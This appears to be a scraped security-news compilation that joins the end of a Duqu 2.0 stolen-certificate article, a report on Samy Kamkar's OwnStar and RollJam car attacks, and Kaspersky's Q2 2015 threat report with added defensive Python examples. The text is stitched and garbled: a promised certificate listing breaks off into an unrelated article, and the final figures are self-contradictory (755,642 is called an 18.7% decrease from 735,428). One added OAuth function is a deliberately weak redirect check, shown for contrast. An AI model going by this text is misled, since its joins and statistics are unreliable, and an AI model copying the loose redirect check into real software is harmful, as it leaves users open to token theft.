During our previous research into Stuxnet and Duqu we observed digitally signed malware (using stolen JMicron and Realtek certificates). Stealing digital certificates and signing malware on behalf of legitimate businesses seems to be a regular trick of the Duqu attackers. We have no confirmation that any of these vendors have been compromised, but our indicators definitely show that the Duqu attackers have a major interest in hardware manufacturers such as Foxconn, Realtek and JMicron. This was confirmed in the 2014/2015 attacks, when we observed infections associated with hardware manufacturers from APAC, including ICS and SCADA computer equipment manufacturers.
Another interesting observation is that besides these Duqu drivers we haven’t uncovered any other malware signed with the same certificates. That argues against the possibility that the certificates have leaked and are being used by multiple groups. It also seems to indicate that the Duqu attackers are the only ones who have access to these certificates, which strengthens the theory that they hacked the hardware manufacturers in order to get them.
Finally, it’s interesting that the Duqu attackers are also careful enough not to use the same digital certificate twice. This is something we have seen with Duqu in both 2011 and 2015. If that is the pattern, then the attackers might have enough alternative stolen digital certificates from other manufacturers ready to be used during the next targeted attack. This would be extremely alarming because it effectively undermines trust in digital certificates.
Both Verisign and HON HAI have been informed about the use of the certificate to sign the Duqu 2.0 malware.
IOC
Sample MD5 (portserv.sys): 92e724291056a5e30eca038ee637a23f
Serial number of Foxconn certificate used by Duqu attackers:
25 65 41 e2 04 61 90 33 f8 b0 9f 9e b7 c8 8e f8
Full certificate of the malicious driver:
OwnStar Attack Now Aimed at BMW, Chrysler, Mercedes Cars
16.8.2015
The OwnStar attack that hacker Samy Kamkar revealed late last month can be used against not only GM vehicles, but cars manufactured by Mercedes-Benz, BMW, and Chrysler, as well. The attack allows Kamkar to intercept the traffic from nearby mobile phones that have specific apps open that control safety and security features on their vehicles.
Kamkar built a Raspberry Pi-based device he calls OwnStar to execute the attack, which he demonstrated originally against the GM OnStar RemoteLink app. The device can intercept the traffic, send special packets to the device, gain credentials and then locate, unlock, and start the victim’s vehicle.
“After a user opens the RemoteLink mobile app on their phone near my OwnStar device, OwnStar intercepts the communications and sends specially crafted packets to the mobile device to acquire additional credentials then notifies me, the attacker, about the vehicle that I indefinitely have access to, including its location, make, and model,” Kamkar said in a video demonstrating the device.
Shortly after Kamkar disclosed the attack, which took advantage of a flaw in the RemoteLink app, GM issued a fix. But Kamkar said that he discovered the attack also works against the mobile apps used by BMW, Mercedes-Benz, and Chrysler owners. The BMW Remote, Mercedes-Benz mbrace, and Chrysler Uconnect apps all are vulnerable to the attack, Kamkar said. The main problem is that the apps fail to validate SSL certificates, so a device in the middle can present its own certificate and read the session.
Kamkar has been taking dead aim at vehicle security in recent weeks. Last week at DEF CON, he gave a talk on the topic and disclosed details of another device he’s built called RollJam that enables him to intercept signals from car remotes and replay them later to unlock the vehicles. The device can be hidden under a car and works against vehicles that use rolling, rather than fixed, codes.
“So when you are walking towards your car, you hit the unlock button — because it’s jammed, the car can’t hear it, however my device is also listening so my device hears your signal (and removes the jamming signal because it knows what to remove). Now I have a rolling code that your car has not yet heard,” Kamkar said via email.
IT threat evolution in Q2 2015
14.8.2015
Q2 in figures
According to KSN data, Kaspersky Lab solutions detected and repelled a total of 379,972,834 malicious attacks from online resources located all over the world.
Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
65,034,577 unique URLs were recognized as malicious by web antivirus components.
51% of web attacks neutralized by Kaspersky Lab products were carried out using malicious web resources located in Russia.
There were 5,903,377 registered notifications about attempted malware infections aiming at stealing money via online access to bank accounts.
Kaspersky Lab’s file antivirus detected a total of 110,731,713 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected
1,048,129 installation packages;
291,887 new malicious mobile programs;
630 mobile banker Trojans.
Overview
Targeted attacks and malware campaigns
Monkey business
Recently we published our analysis of CozyDuke, yet another cyber-espionage APT from the ‘Duke’ family – which also includes MiniDuke, CosmicDuke and OnionDuke. CozyDuke (also known as ‘CozyBear’, ‘CozyCar’ and ‘Office Monkeys’) targets government organisations and businesses in the US, Germany, South Korea and Uzbekistan.
The attack implements a number of sophisticated techniques, including encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family.
However, one of CozyDuke’s most notable features is its use of social engineering to get an initial foothold in targeted organisations. Some of the attackers’ spear-phishing emails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as email attachments. A notable example (which also gives the malware one of its names) is ‘OfficeMonkeys LOL Video.zip’. When run, this drops a CozyDuke executable on to the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers.
The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.
Naikon: gathering geo-political intelligence
In May we published our report on the Naikon APT. Naikon is used in campaigns against sensitive targets in South-eastern Asia and around the South China Sea. The attackers seem to be Chinese-speaking and have been active for at least five years, focusing their attention on top-level government agencies and civil and military organizations in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China.
As with so many campaigns of this kind, the attackers use spear-phishing emails to trick unsuspecting staff into loading the malware. Emails include an attached file containing information likely to be of interest to the victim. The file seems to be a standard Word document, but it is really an executable with a double extension, or an executable that uses the RTLO (right to left override) mechanism to mask the real extension of the file. If the victim clicks on the file, it installs spyware on the computer while displaying a decoy document to avoid arousing suspicion.
Naikon’s main module is a remote administration tool: this module supports 48 commands to exercise control over infected computers. These include commands to take a complete inventory, download and upload data, and install add-on modules. In addition, Naikon sometimes uses keyloggers to obtain employees’ credentials.
Each target country is assigned its own operator, who is able to take advantage of local cultural features – for example, the tendency to use personal email accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer data to the attackers’ Command-and-Control (C2) servers.
You can find our main report and follow-up report on our web site.
Spying on the spies
While researching Naikon, we uncovered the activities of the Hellsing APT group. This group focused mainly on government and diplomatic organisations in Asia – most victims are located in Malaysia and the Philippines, although we have also seen victims in India, Indonesia and the US.
In itself, Hellsing is a small and technically unremarkable cyber-espionage group (around 20 organisations have been targeted by Hellsing). What makes it interesting is that the group found itself on the receiving end of a spear-phishing attack by the Naikon APT group – and decided to strike back! The target of the email questioned the authenticity of the email with the sender. They subsequently received a response from the attacker, but didn’t open the attachment. Instead, shortly afterwards they sent an email back to the attackers that contained their own malware. It’s clear that, having detected that they were being targeted, the Hellsing group was intent on identifying the attackers and gathering intelligence on their activities.
In the past, we’ve seen APT groups accidentally treading on each other’s toes – for example, stealing address books from victims and then mass-mailing everyone on each of the lists. But an APT-on-APT attack is unusual.
Grabit and run
Many targeted attack campaigns focus on large enterprises, government agencies and other high-profile organisations. So it’s easy to read the headlines and imagine that such organisations are the only ones on the radar of the attackers. However, one of the campaigns we reported last quarter showed clearly that it’s not only ‘big fish’ that attackers are interested in. Every business is a potential target – for its own assets, or as a way of infiltrating another organisation.
The Grabit cyber-espionage campaign is designed to steal data from small- and medium-sized organisations – mainly based in Thailand, Vietnam and India, although we have also seen victims in the US, UAE, Turkey, Russia, China, Germany and elsewhere. The targeted sectors include chemicals, nanotechnology, education, agriculture, media and construction. We estimate that the group behind the attacks has been able to steal around 10,000 files.
The malware is delivered in the form of a Word document attached to an email. The document contains a malicious macro named ‘AutoOpen’. This macro opens a socket over TCP and sends an HTTP request to a remote server that was hacked by the group to serve as a malware hub. Then the program used to carry out the spying operation is downloaded from this server. In some cases, the macro is password protected (the attackers seem to have forgotten that a DOC file is actually an archive; and when it’s opened in an editor, macro strings are shown in clear-text). The attackers control compromised computers using a commercial spying tool called HawkEye (from HawkEyeProducts). In addition, they use a number of Remote Administration Tools (RATs).
The attackers have implemented some techniques designed to make Grabit hard to analyze, including variable code sizes, code obfuscation and encryption. On the other hand, they fail to cover their tracks in the system. The result is a ‘weak knight in heavy armor’, suggesting that the attackers didn’t write all the code themselves.
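As an added example (not code from the Kaspersky report), the following Python triage routine applies the two file-name tricks described for Naikon (RTLO masking and a double extension) and the macro delivery described for Grabit to an incoming attachment: it recovers the real extension, shows how the name would render, and checks a modern OOXML Word file (a ZIP container) for a VBA project. The file names and document bytes are constructed for the demonstration.

```python
import io
import zipfile

# Unicode bidirectional control characters that change how a name is rendered.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta", "lnk"}
DOCUMENT_EXTS = {"doc", "docx", "docm", "xls", "xlsx", "pdf", "rtf", "ppt", "pptx", "txt"}


def displayed_name(name: str) -> str:
    """Approximate the rendered name: text after U+202E (RLO) is drawn right to left."""
    head, rlo, tail = name.partition("\u202e")
    return head + tail[::-1] if rlo else name


def analyse_filename(name: str) -> dict:
    """Report the real extension, how the name displays, and why it looks suspicious."""
    reasons = []
    if any(c in BIDI_CONTROLS for c in name):
        reasons.append("bidi override character in name")
    # The OS opens the file by its real (last) extension, whatever is displayed.
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    parts = [p.strip().lower() for p in clean.split(".")]
    real_ext = parts[-1] if len(parts) > 1 else ""
    if real_ext in EXECUTABLE_EXTS:
        reasons.append("real extension is executable: ." + real_ext)
        # Double extension such as "report.doc<many spaces>.exe".
        if len(parts) > 2 and parts[-2] in DOCUMENT_EXTS:
            reasons.append("document extension precedes it: ." + parts[-2] + "." + real_ext)
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].strip().lower() if "." in shown else ""
    if shown_ext in DOCUMENT_EXTS and shown_ext != real_ext:
        reasons.append("displays as ." + shown_ext + " but opens as ." + real_ext)
    return {"real_ext": real_ext, "displayed": shown,
            "suspicious": bool(reasons), "reasons": reasons}


def has_vba_project(data: bytes) -> bool:
    """True if an OOXML document (a ZIP container) carries a VBA project."""
    if not data.startswith(b"PK"):
        return False  # legacy OLE2 .doc is not a ZIP; out of scope for this check
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def build_sample_document(with_macro: bool) -> bytes:
    """Constructed stand-in for a Word file: only the ZIP entries the check inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"constructed placeholder, not real VBA")
    return buf.getvalue()


def triage(name: str, data: bytes) -> dict:
    """Combine the name checks and the macro check into one verdict for an attachment."""
    result = analyse_filename(name)
    if has_vba_project(data):
        result["reasons"].append("document contains a VBA project (macros)")
        result["suspicious"] = True
    return result
```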
The return of Duqu
In spring 2015, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several internal systems. The full-scale investigation that followed uncovered the development of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu, sometimes referred to as the step-brother of Stuxnet. We named this new platform ‘Duqu 2.0′.
In the case of Kaspersky Lab, the attack took advantage of a zero-day vulnerability in the Windows kernel (patched by Microsoft on 9 June 2015) and possibly up to two others (now patched) that were also zero-day vulnerabilities at the time. The main goal of the attackers was to spy on Kaspersky Lab technologies, ongoing research and internal processes.
However, Kaspersky Lab was not the only target. Some Duqu 2.0 infections were linked to the P5+1 events related to negotiations with Iran about a nuclear deal. The attackers appear to have launched attacks at the venues for some of these high-level talks. In addition, the group launched a similar attack related to the 70th anniversary event of the liberation of Auschwitz-Birkenau.
One of Duqu 2.0’s most notable features was its lack of persistence, leaving almost no traces in the system. The malware made no changes to the disk or system settings: the malware platform was designed in such a way that it survives almost exclusively in the memory of infected systems. This suggests that the attackers were confident that they could maintain their presence in the system even if an individual victim’s computer was re-booted and the malware was cleared from memory.
The Duqu 2.0 technical paper and analysis of the persistence module can be found on our web site.
Malware stories
Simda’s hide-and-seek malware business
In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.
As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed 190 countries that had been affected by the botnet.
The bots are distributed via a series of infected web sites that re-direct visitors to exploit kits. The bots download and run additional components from their own update servers and are able to modify the hosts file on the infected computer: in this way, once-infected computers can keep sending out HTTP requests to the malicious servers, indicating that they are still vulnerable to re-infection using the same exploit kits.
Although the Simda botnet is relatively large, with an estimated 770,000 infected computers, the authors went to great lengths to try and make it ‘fly under the radar’ of anti-malware systems. The malware is able to detect emulation, security tools and virtual machines; it uses a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network; and it implements server-side polymorphism.
Simda also de-activates itself after a short time. This is closely related to the purpose of this particular botnet: it’s a delivery mechanism, designed to disseminate potentially unwanted and malicious software. The distributors wanted to guarantee that only their client’s malware would be installed on infected computers.
Kaspersky Lab products currently detect hundreds of thousands of modifications of Simda, together with many different third-party malicious programs distributed using the Simda botnet. You can use our free Simda bot IP scanner to check if your IP has connected to a Simda C2 server in the past.
Phishing, but not as we know it
Early in 2014 a serious vulnerability in the OAuth and OpenID protocols was discovered by Wang Jing, a PhD student at the Nanyang Technological University in Singapore. He found what he named the ‘covert redirect’ vulnerability, which could allow an attacker to steal data following authentication (a summary of the problem, including a link to Jing’s blog, can be found on Threatpost).
Recently, we discovered a phishing campaign that takes advantage of the OAuth vulnerability. OAuth lets customers of online services give third parties limited access to their protected resources without sharing their credentials. It is commonly used by applications for social networks – for example, to obtain access to someone’s contact lists or other data.
The Kaspersky Lab customer who reported the attack received an email saying that someone had used their Windows Live ID and asking them to follow a link to the Windows Live site and follow the security requirements outlined there.
On the face of it, it seems like a standard phishing technique – one that would result in the victim being re-directed to a fake site. But in this case, the link led to the legitimate site. The victim’s login credentials aren’t stolen and they are logged in to the legitimate site. However, after authorization, the victim receives a request for a range of permissions from an unknown application. This can include automatic login, access to profile information, contact list and email addresses. If the victim hands over these rights, it offers the cybercriminals access to their personal information – information that they can use to distribute spam, phishing links or for other fraudulent purposes.
We would recommend the following to safeguard your personal data.
Do not click on links you receive by email or in messages on social networks.
Do not allow untrusted applications to access your data.
Before you agree to such requests, carefully read the description of the access rights being requested by an application.
Read reviews and feedback on the application on the Internet.
Review the rights of currently installed applications and modify the settings if you need to.
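The following added example (not from the report) shows, from the authorization server’s side, the redirect_uri check that the covert redirect issue turns on: comparing the requested URI against the registered one with exact string matching instead of accepting anything on the registered host. The client registration and URIs are constructed for the demonstration.

```python
from urllib.parse import urlsplit

# Constructed registration record for a hypothetical client application.
REGISTERED_REDIRECTS = {
    "client-123": {"https://app.example.com/oauth/callback"},
}


def loose_match(client_id: str, redirect_uri: str) -> bool:
    """Weak policy shown for contrast: accept any URI on a registered host (do not use).

    With this rule an open redirector anywhere on the client's domain becomes a
    valid destination for the authorization response, which is the covert redirect flaw.
    """
    hosts = {urlsplit(u).netloc for u in REGISTERED_REDIRECTS.get(client_id, ())}
    return urlsplit(redirect_uri).netloc in hosts


def strict_match(client_id: str, redirect_uri: str) -> bool:
    """Exact comparison with the registered set; path, query and fragment must all match."""
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https" or parts.fragment or "@" in parts.netloc:
        return False
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, ())


def authorization_target(client_id: str, redirect_uri: str, matcher) -> str:
    """Where the authorization response (code or token) would be delivered, or a refusal."""
    if not matcher(client_id, redirect_uri):
        # RFC 6749 requires the server to show an error here rather than redirect.
        return "refused: redirect_uri not registered"
    return "302 Location: " + redirect_uri
```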
Smart cities but not-so-smart security
The use of CCTV systems by governments and law enforcement agencies for surveilling public places has grown enormously in recent years. Most of us accept them as a reasonable trade-off between privacy and security. However, this rather assumes that the data gathered using this technology will be handled securely and responsibly, to ensure that the benefits aren’t outweighed by any potential dangers.
Many CCTV cameras have a wireless connection to the Internet, enabling police to monitor them remotely. However, this is not necessarily secure: it’s possible for cybercriminals to passively monitor security camera feeds, to inject code into the network – thereby replacing a camera feed with fake footage – or to take systems offline. Two security researchers (Vasilios Hioureas from Kaspersky Lab and Thomas Kinsey from Exigent Systems) recently conducted research into the potential security weaknesses in CCTV systems in one city. You can read Vasilios’s report on our web site.
The researchers started by looking at the surveillance equipment in locations across the city. Unfortunately, there had been no attempt to mask the branding of the cameras, so it was easy to determine the makes and models of the cameras, examine the relevant specs and create their own scale model in the lab. The equipment being used provided effective security controls, but these controls were not being implemented. Data packets passing across the mesh network were not being encrypted, so that an attacker would be able to create their own version of the software and manipulate data travelling across it.
It’s important to note that they did not attempt to hack into the real network, but analyzed the hardware and communication protocols and built a scale model. The network topology of the surveillance camera network is unlike a standard home wireless network. On a home network, all devices connect to the Internet and one another through a router. Any device connected to that router could potentially trick the other devices into thinking it’s the router and monitor or change data by performing a Man-in-the-Middle attack.
The surveillance camera network is more complicated, because of the distances the data needs to travel. The data must travel from any given camera through a series of nodes eventually leading back to a hub (in a real world implementation, this might be a police station). The traffic follows the path of least resistance where each node has the ability to communicate with several others and selects the easiest path back to the hub.
Hioureas and Kinsey built a series of fake nodes that purported to offer a direct line of communication to a simulated police station. Since they knew all the protocols used on the network, they were able to create a Man-in-the-Middle node that seemed to offer the path of least resistance, causing the real nodes to relay their traffic through their malicious node.
One potential use for attackers would be to spoof footage sent to a police station. This could make it appear as if there was an incident in one location, thereby distracting police from a real attack occurring elsewhere in the city.
The researchers reported these issues to the authorities responsible for the city surveillance systems concerned and they are in the process of fixing the security problems. In general, it’s important that WPA encryption, protected by a strong password, is implemented in these networks; that labelling is removed from hardware, to make it harder for would-be attackers to find out how the equipment operates; and that footage is encrypted as it travels through the network.
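As an added example (not the researchers’ code), the following Python sketch shows how the hub could reject footage substituted by a rogue relay node: each camera tags its frames with an HMAC under a per-camera key, and the hub verifies the tag and a sequence number before accepting a frame, whichever path it arrived by. Camera identifiers, keys and frame contents are constructed; the HMAC protects integrity and origin only, so link encryption (the WPA recommendation above) is still needed for confidentiality.

```python
import hashlib
import hmac
import struct

MAC_LEN = 32  # HMAC-SHA256 output size
# Constructed per-camera keys, assumed to be provisioned when the camera is installed.
CAMERA_KEYS = {b"cam-07": b"constructed-key-for-camera-07"}


def tag_frame(cam_id: bytes, seq: int, payload: bytes) -> bytes:
    """Camera side. Frame layout: len(cam_id) | cam_id | seq | payload | HMAC(everything before)."""
    header = struct.pack(">H", len(cam_id)) + cam_id + struct.pack(">Q", seq)
    body = header + payload
    return body + hmac.new(CAMERA_KEYS[cam_id], body, hashlib.sha256).digest()


def relay_substituting(frame: bytes, fake_payload: bytes) -> bytes:
    """What a rogue node on the path can do: swap the footage, but not recompute the tag."""
    n = struct.unpack(">H", frame[:2])[0]
    return frame[:10 + n] + fake_payload + frame[-MAC_LEN:]


class Hub:
    """Receiver at the police station; trusts no intermediate node, only the camera's key."""

    def __init__(self):
        self.last_seq = {}  # highest accepted sequence number per camera

    def accept(self, frame: bytes):
        """Return (True, payload) for a genuine fresh frame, else (False, reason)."""
        if len(frame) < 2 + 8 + MAC_LEN:
            return False, "truncated"
        n = struct.unpack(">H", frame[:2])[0]
        if len(frame) < 10 + n + MAC_LEN:
            return False, "truncated"
        cam_id = frame[2:2 + n]
        key = CAMERA_KEYS.get(cam_id)
        if key is None:
            return False, "unknown camera"
        body, mac = frame[:-MAC_LEN], frame[-MAC_LEN:]
        expected = hmac.new(key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, mac):
            return False, "bad mac"          # modified or forged on the way
        seq = struct.unpack(">Q", frame[2 + n:10 + n])[0]
        if seq <= self.last_seq.get(cam_id, -1):
            return False, "replay"           # old footage re-sent to mask an incident
        self.last_seq[cam_id] = seq
        return True, frame[10 + n:-MAC_LEN]
```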
The wider issue here is that more and more aspects of everyday life are being made digital: if security isn’t considered as part of the design stage, the potential dangers could be far-reaching – and retro-fitting security might not be straightforward. The Securing Smart Cities initiative, supported by Kaspersky Lab, is designed to help those responsible for developing smart cities to do so with cyber-security in mind.
Statistics
All the statistics used in this report were obtained using the Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.
Mobile threats
Mobile banker Trojans still remain among the top mobile threats. In our Q1 2015 report, we mentioned Trojan-SMS.AndroidOS.OpFake.cc, which could attack at least 29 banking and financial applications. The latest version of this Trojan can now attack 114 banking and financial applications. Its main goal is to steal the user’s online credentials. Serving the same purpose, it also attacks several popular email applications.
Trojan-Spy.AndroidOS.SmsThief.fc also deserves a mention. Cybercriminals managed to add their code into the original banking application without affecting its operation, making this Trojan more difficult to detect.
A new iOS Trojan, Trojan.IphoneOS.FakeTimer.a, emerged in Q2. It is interesting in that it is an iOS version of a malicious Android app which emerged several years ago. FakeTimer.a attacks even non-jailbroken devices. Its payload is rather primitive: it is a regular phishing application created to steal money from Japanese users.
In Q2, Trojans which can use root privileges to display advertisements to users or install advertising applications became especially visible. A total of six such malicious programs landed in the Q2 TOP 20 of malicious mobile programs.
The number of new mobile threats
In Q2 2015, Kaspersky Lab mobile security products detected 291,887 new malicious mobile programs, a 2.8-fold increase on Q1 2015.
The number of installation packages detected was 1,048,129 – this is seven times as many as in the previous quarter.
Number of malicious installation packages and new malicious mobile programs detected (Q4 2014 – Q2 2015)
Distribution of mobile malware by type
Distribution of new mobile malware by type, Q2 2015
The ranking of malware objects for mobile devices for the second quarter of 2015 was headed by RiskTool (44.6%). These are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses.
Potentially unwanted advertising apps came second with 19%.
SMS Trojans have previously led this ranking, but in Q2 they were only in fourth place with 8.1% – this is 12.9% lower than in Q1. The lower share taken by these malicious programs is in part accounted for by the fact that those who were previously active distributing SMS Trojans have started using ‘cleaner’ monetization techniques (as testified by the increased RiskTool share), or prefer to use other types of malware. Thus the Trojan share increased from 9.8% in Q1 to 12.4% in Q2.
Top 20 malicious mobile programs
Please note that, starting from this quarterly report, we are publishing the ranking of malicious programs, which does not include potentially dangerous or unwanted programs such as RiskTool or adware.
Name % of attacks *
1 DangerousObject.Multi.Generic 17.5%
2 Trojan-SMS.AndroidOS.Podec.a 9.7%
3 Trojan-SMS.AndroidOS.Opfake.a 8.0%
4 Backdoor.AndroidOS.Obad.f 7.3%
5 Trojan-Downloader.AndroidOS.Leech.a 7.2%
6 Exploit.AndroidOS.Lotoor.be 5.7%
7 Trojan-Spy.AndroidOS.Agent.el 5.5%
8 Trojan.AndroidOS.Ztorg.a 3.1%
9 Trojan.AndroidOS.Rootnik.a 3.0%
10 Trojan-Dropper.AndroidOS.Gorpo.a 2.9%
11 Trojan.AndroidOS.Fadeb.a 2.7%
12 Trojan-SMS.AndroidOS.Gudex.e 2.5%
13 Trojan-SMS.AndroidOS.Stealer.a 2.5%
14 Exploit.AndroidOS.Lotoor.a 2.1%
15 Trojan-SMS.AndroidOS.Opfake.bo 1.6%
16 Trojan.AndroidOS.Ztorg.b 1.6%
17 Trojan.AndroidOS.Mobtes.b 1.6%
18 Trojan-SMS.AndroidOS.FakeInst.fz 1.6%
19 Trojan.AndroidOS.Ztorg.pac 1.5%
20 Trojan-SMS.AndroidOS.FakeInst.hb 1.4%
* Percentage of users attacked by the malware in question, relative to all users attacked
The top position in the rankings was occupied by DangerousObject.Multi.Generic (17.5%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats.
Trojan-SMS.AndroidOS.Podec.a (9.7%) has been among the Top Three malicious mobile programs for three quarters in a row due to its active dissemination.
Trojan-SMS.AndroidOS.Opfake.a (8.0%) has been quickly rising to the top lines of the ranking. While in Q3 2014 it was only in 11th place, it is now in the TOP 3 of mobile malware. Opfake.bo, another representative of this malware family, is in 15th place.
It is also worth mentioning the appearance of Backdoor.AndroidOS.Obad in the TOP 20 ranking – in fact, it jumped to fourth place all at once. This is a multi-functional Trojan, capable of sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. We wrote about it two years ago, and its capabilities have remained virtually unchanged ever since.
Another interesting thing is that although this ranking does not include adware programs, six of the TOP 20 malicious mobile programs use advertisements as the main vehicle of monetization. Unlike regular advertisement modules, Trojan.AndroidOS.Rootnik.a, three programs of the Trojan.AndroidOS.Ztorg family, Trojan-Downloader.AndroidOS.Leech.a and Trojan.AndroidOS.Fadeb.a do not carry any productive payload with them. Their goal is to deliver to the user as much advertising as possible in various ways, including installation of new adware programs. These Trojans can use root privileges to conceal themselves in the system folder – this makes it very difficult to delete them.
Mobile banker Trojans
In Q2 2015, we detected 630 mobile banker Trojans. It should be noted that the number of new malware programs belonging to this category is now growing at a much slower rate.
Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q3 2014 – Q2 2015)
Geography of mobile banking threats in Q2 2015
(number of users attacked)
The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.
Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):
Country* % of users attacked by mobile bankers**
1 Republic of Korea 2.37%
2 Russia 0.87%
3 Uzbekistan 0.36%
4 Belarus 0.30%
5 Ukraine 0.29%
6 China 0.25%
7 Kazakhstan 0.17%
8 Australia 0.14%
9 Sweden 0.13%
10 Austria 0.12%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country
Mobile bankers proliferate most actively in Korea. Cybercriminals are also historically active in Russia and other post-Soviet countries. Some of these countries occupy four of the top five positions in the ranking.
An indication of how popular mobile banker Trojans are with cybercriminals in each country may be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the reported three-month period, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking is different from the one above:
TOP 10 countries by the percentage of users attacked by mobile bankers relative to all attacked users
Country* % of users attacked by mobile bankers, relative to all attacked users**
1 Republic of Korea 31.72%
2 Russia 10.35%
3 Australia 6.62%
4 Austria 6.03%
5 Japan 4.73%
6 Uzbekistan 4.17%
7 Belarus 3.72%
8 Ecuador 3.50%
9 Ukraine 3.46%
10 Switzerland 3.09%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country
In Korea, almost one third of all users attacked by mobile malware were attacked by mobile bankers in particular. In Russia, every tenth attacked user came under a mobile banker attack. In other countries, this percentage is lower. Interestingly, there are four countries in this TOP 10 which are also in the TOP 5 of most secure countries with the lowest probability of mobile malware infection – these are Australia, Austria, Japan and Switzerland.
The geography of mobile threats
The geography of mobile malware infection attempts in Q2 2015
(percentage of all users attacked)
Top 10 countries attacked by mobile malware:
Country* % of users attacked**
1 China 16.34%
2 Malaysia 12.65%
3 Nigeria 11.48%
4 Bangladesh 10.89%
5 Tanzania 9.66%
6 Algeria 9.33%
7 Uzbekistan 8.56%
8 Russia 8.51%
9 Ukraine 8.39%
10 Belarus 8.05%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country
This ranking is led by China, where 16.34% of all users of Kaspersky Lab’s product were attacked at least once during the three month period. Malaysia is in second place with 12.65%. Russia (8.51%), Ukraine (8.39%) and Belarus (8.05%) close the TOP 10 ranking, below some Asian and African countries.
Korea took 11th place in this ranking with 7.46%. Let us remind the reader that mobile banker Trojans are very popular with the Korean cybercriminals: 31.72% of all users attacked by mobile malware were the victim of a mobile banking Trojan attack.
The most secure countries in this respect are:
Country % of users attacked
1 Japan 1.06%
2 Canada 1.82%
3 Austria 1.96%
4 Australia 2.16%
5 Switzerland 2.19%
Vulnerable applications used by fraudsters
The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.
Distribution of exploits used in attacks by type of application attacked, Q2 2015
The rating of exploits has seen little change from the first quarter. The Browsers category (60%) maintained its top position in Q2 2015. Currently most exploit packs contain exploits for Adobe Flash Player and Internet Explorer. It is worth mentioning the growing number of exploits for Adobe Flash Player (up by six percentage points), which is caused by the large number of spam mass mailings containing malicious PDF documents.
The number of exploits for Java continues to decrease (down four percentage points): in Q2 we did not see any new exploits for Java.
In the second quarter of 2015 we registered the use of four new vulnerabilities in Adobe Flash Player:
CVE-2015-3113
CVE-2015-3104
CVE-2015-3105
CVE-2015-3090
Although the share of exploits for Adobe Flash Player in our rating is only 3%, there are many more of them in the “wild”. When considering these statistics, we should take into account that Kaspersky Lab technologies detect exploits at various stages. The Browsers category also includes detection of landing pages that “distribute” exploits. According to our observations, these are most often exploits for Adobe Flash Player.
Online threats (Web-based attacks)
The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.
Online threats in the banking sector
In the second quarter of 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on the computers of 755,642 users. This figure represents an 18.7% decrease compared to the previous quarter (735,428).
